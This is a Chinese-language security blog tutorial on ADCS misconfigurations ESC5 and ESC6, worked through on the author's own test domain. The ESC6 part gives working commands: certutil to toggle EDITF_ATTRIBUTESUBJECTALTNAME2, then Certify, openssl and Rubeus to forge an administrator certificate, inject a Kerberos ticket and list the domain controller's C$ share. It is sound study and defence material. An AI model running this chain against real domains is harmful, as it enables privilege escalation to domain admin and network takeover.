T0ngMystic`s Blog

"Security studying, Strive to be Security Re-Searcher. Love everything that I want to do"

AD域-ADCS错误配置-ESC5-ESC6

image

2023-11-16 / 共计986 字


交替的四季都在告诉你,要向前走。

The alternating seasons are all telling you to move forward.

ADCS-ESC配置错误文章目录:

  1. ESC1: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc1/
  2. ESC2: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc2/
  3. ESC3: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc3/
  4. ESC4: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc4/
  5. ESC5_ESC6: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc5-esc6/
  6. ESC7: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc7/
  7. ESC8: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc8/

ESC5

《Certified Pre-Owned – Abusing Active Directory Certificate Services》中,描述ESC5影响范围比较广泛,不仅是证书模板和证书服务,其它对象也会对ADCS产生影响,例如:

● CA 服务器的 AD 计算机对象(即通过 S4U2Self 或 S4U2Proxy 进行攻击)

● CA服务器的RPC/DCOM服务器

● 容器中的任何子 AD 对象或容器 CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=例如,

证书模板容器、证书颁发机构容器、 NTAuthCertificates 对象、注册服务容器等)

image.png

由于ESC5涉及的范围比较宽泛,后续有想法再仔细了解吧。

ESC6

《Certified Pre-Owned – Abusing Active Directory Certificate Services》中,提到ESC6开启EDITF_ATTRIBUTESUBJECALTNAME2时,无论什么模版,都可以使用alternative name进行用户伪造。也就是说当EDITF_ATTRIBUTESUBJECALTNAME2启用时,任何有客户端认证的证书模版都可以使用ESC1进行利用。(首当其冲的就是默认带的User模版了)

在微软官方解释是这样的,当EDITF_ATTRIBUTESUBJECALTNAME2启用时,任何请求都可以定义任意值在alternative name中:

image.png


##3 EDITF_ATTRIBUTESUBJECALTNAME2开启与关闭 在CA服务器上查看是否启用了EDITF_ATTRIBUTESUBJECALTNAME2

certutil -getreg policy\EditFlags

image-AD域-ADCS错误配置-ESC6-20231115192919316

启用EDITF_ATTRIBUTESUBJECALTNAME2

certutil –setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
或
certutil -config "DC1.t0ngmystictestad.com\t0ngmystictestad-DC1-CA" -setreg "policy\EditFlags" +EDITF_ATTRIBUTESUBJECTALTNAME2

image.png

禁用EDITF_ATTRIBUTESUBJECALTNAME2

certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
或
certutil -config "DC1.t0ngmystictestad.com\t0ngmystictestad-DC1-CA" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2

image.png

当启用或禁用时,需重启服务才能生效:

net stop certsvc && net start certsvc

image.png


ESC6利用

探测是否开启EDITF_ATTRIBUTESUBJECALTNAME2

Certify.exe find /vulnerable

image.png

给定alternative name为administrator,伪造administrator身份注册User证书:

Certify.exe request /ca:DC1.t0ngmystictestad.com\t0ngmystictestad-DC1-CA /template:User /altname:administrator

image.png

修改证书为pfx格式:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

image.png

通过Rubeus请求tgt并注入内存:

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.111.11 /ptt

image.png

成功以administrator域管身份访问域控:

dir \\dc1.t0ngmystictestad.com\c$

image.png

文笔垃圾,技术欠缺,欢迎各位大师傅请斧正,非常感谢!


如果文章对您有帮助

欢迎关注公众号!

感谢您的支持!